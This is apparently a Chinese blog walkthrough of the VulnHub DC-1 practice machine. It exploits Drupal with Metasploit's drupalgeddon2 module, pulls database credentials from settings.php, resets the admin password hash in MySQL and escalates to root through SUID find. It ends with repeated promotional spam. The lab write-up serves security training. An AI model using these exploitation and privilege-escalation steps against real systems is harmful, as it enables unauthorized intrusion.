vuln靶场——DC-1



![](https://img-blog.csdnimg.cn/img_convert/461fb22932d92299a87b5a99ac7d6bc7.png)


#### 进入MSF控制台搜索drupal模块



msfconsole
search drupal



![](https://img-blog.csdnimg.cn/img_convert/8c5fac33613246fbe4103689a47a864d.png)


#### 选择模块进行测试


使用2018的测试



use exploit/unix/webapp/drupal_drupalgeddon2



![](https://img-blog.csdnimg.cn/img_convert/c87bcd15736b94a073f7a5776093845c.png)


设置靶机IP运行msf



set rhosts 192.168.178.108

run



![](https://img-blog.csdnimg.cn/img_convert/6872765fc82bbaa4f8f65bd336d10359.png)


成功获取权限



![](https://img-blog.csdnimg.cn/img_convert/9a28c6f32ef5ca0a745a9aa0ac195587.png)


#### 进入shell


输入id,



shell
id


执行`whoami`,查询当前用户的身份信息



whoami



![](https://img-blog.csdnimg.cn/img_convert/def31992cb6f2e7017d3b0d51023a49b.png)


发现是www-data用户权限


##### 发现flag4.txt文件


进入home目录,发现flag4.txt文件,提示需要提升权限



![](https://img-blog.csdnimg.cn/img_convert/c2b8bc5b448b86d7b83ea9ea841ada38.png)


##### 使用python反弹一个交互式shell



python -c “import pty;pty.spawn(‘/bin/bash’)”


将当前的shell提升一个交互式的shell,以便执行更多的命令和操作。



![](https://img-blog.csdnimg.cn/img_convert/33a2196dcdd267a6c4fd5774e1395fee.png)


##### 进入到www目录,发现flag1文件


查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件



cd /var/www/
ls
cat flag1.txt



![](https://img-blog.csdnimg.cn/img_convert/80a2f04f59f8104bb66e4148cbefcd78.png)


##### 发现flag2


Drupal的默认配置文件



![](https://img-blog.csdnimg.cn/img_convert/7f3859ec4bb38a962aaa858d233cd106.png)


[Drupal 默认安装的目录结构-腾讯云开发者社区-腾讯云](https://bbs.csdn.net/topics/618653875)



/var/www/sites/default/settings.php


查看文件内容



cat /var/www/sites/default/settings.php


发现了flag2和数据库的账号密码


 flag2提示,提升权限为root来查看敏感文件,或者直接爆破


![](https://img-blog.csdnimg.cn/img_convert/ae373e7d9114a513b4566867277dddb3.png)



![](https://img-blog.csdnimg.cn/img_convert/ca139460e3f40bf911dd8a195aea8fa7.png)



数据库:drupaldb
帐号:dbuser
密码:R0ck3t


我们先进入数据库查看



mysql -u dbuser -p



![](https://img-blog.csdnimg.cn/img_convert/ad9bf37563673105cc400a2a4344f173.png)


查看数据库,切换到drupaldb数据库,查看查找默认的`users` 表



show databases;
use drupaldb;
select * from users;


发现admin信息



![](https://img-blog.csdnimg.cn/img_convert/62d574296605ec771328391e61af50d1.png)



> 
> 置换drupal密码(两种方法)
> 
> 
> [https://www.cnblogs.com/wicub/p/3582637.html](https://bbs.csdn.net/topics/618653875)
> 
> 
> [drupal mysql hash密码\_【Drupal】如何重置Drupal 7的用户密码-CSDN博客](https://bbs.csdn.net/topics/618653875)
> 
> 
> 



![](https://img-blog.csdnimg.cn/img_convert/4dd6b859418699e6b3c23bd5f7f1b716.png)


进入www目录,站点路径下执行脚本,生成新密码



quit;
cd /var/www/
php scripts/password-hash.sh 新密码



![](https://img-blog.csdnimg.cn/img_convert/93a4e9309bb2429919a615f7ea07b628.png)



S S SD6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP


然后在进入数据库中把密码字段进行替换  
 进入mysql,输入密码,切换到drupaldb数据库,将pass字段进行替换



mysql -u dbuser -p
R0ck3t
use drupaldb
update users set pass=“ S S SD6KBbrqTHP5u/1bXnH4YfYPUMnI4E3JfEjNw6Du86.rEBzXQ/qcP” where name=“admin”;



![](https://img-blog.csdnimg.cn/img_convert/70233eac4235d9558154b6809cf91102.png)


#### 登录站点



http://192.168.178.108/



![](https://img-blog.csdnimg.cn/img_convert/fb6f9b28ee73b26c16787c0923e37e25.png)


进行登录,密码是之前我们自己替换的



admin
123456


成功登录



![](https://img-blog.csdnimg.cn/img_convert/d42f5c1812dd2eb19886ede2d93b06fd.png)


##### 发现flag3


登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3



![](https://img-blog.csdnimg.cn/img_convert/1f6e183872ba2a7bc897437fcdc71875.png)


点击flag3进入,发现提示信息



![](https://img-blog.csdnimg.cn/img_convert/b1f5b6cbf263bce4daac86c75317ec71.png)


先`quit;`退出数据库,然后使用命令查看 `suid` 权限的可执行二进制程序


#### find提权


[https://www.cnblogs.com/aaak/p/15718561.html](https://bbs.csdn.net/topics/618653875)



![](https://img-blog.csdnimg.cn/img_convert/b5ddf1f1e6c5270099a2cf29e48d0132.png)



ls -l /usr/bin/find



![](https://img-blog.csdnimg.cn/img_convert/28fc29f249ece147dfe65ace73c21eec.png)



find / -perm -4000 2>/dev/null



![](https://img-blog.csdnimg.cn/img_convert/bfe8fc1b3757c11540ca831ef81ea21b.png)


使用命令测试,发现为root权限



touch 666 (创建一个为666的空文件夹)
ls
find / -name 666 -exec “whoami” ;

find (一个路径或文件必须存在) -exec 执行命令 (结束);
find /usr/bin/find -exec “whoami” ;



![](https://img-blog.csdnimg.cn/img_convert/c1a090f98d76cef9e07fe4a9d04a953d.png)


我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录



find / -name 666 -exec “/bin/sh” ;
whoami
ls
cd /root
ls



![](https://img-blog.csdnimg.cn/img_convert/9666700f3b7a5f1582de4578fa3d7621.png)


查看`thefinalflag.txt`文件



## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/2d477e7ecb2b91a960fb496d63ff826c.png)

![img](https://img-blog.csdnimg.cn/img_convert/653743a74b9383587329376af0e7a77f.png)

![img](https://img-blog.csdnimg.cn/img_convert/d6a575144c6de2b97ff03b4b261ac25a.png)

![img](https://img-blog.csdnimg.cn/img_convert/e65fa7642fd9cb234e6acfaf910724a0.png)

![img](https://img-blog.csdnimg.cn/img_convert/fef111c19ac447b92eaedeaa7452097c.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

q7HG1-1715545380547)]

[外链图片转存中...(img-FAW4plHJ-1715545380547)]

[外链图片转存中...(img-co54VBeK-1715545380547)]

[外链图片转存中...(img-LCs3b0I6-1715545380547)]

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值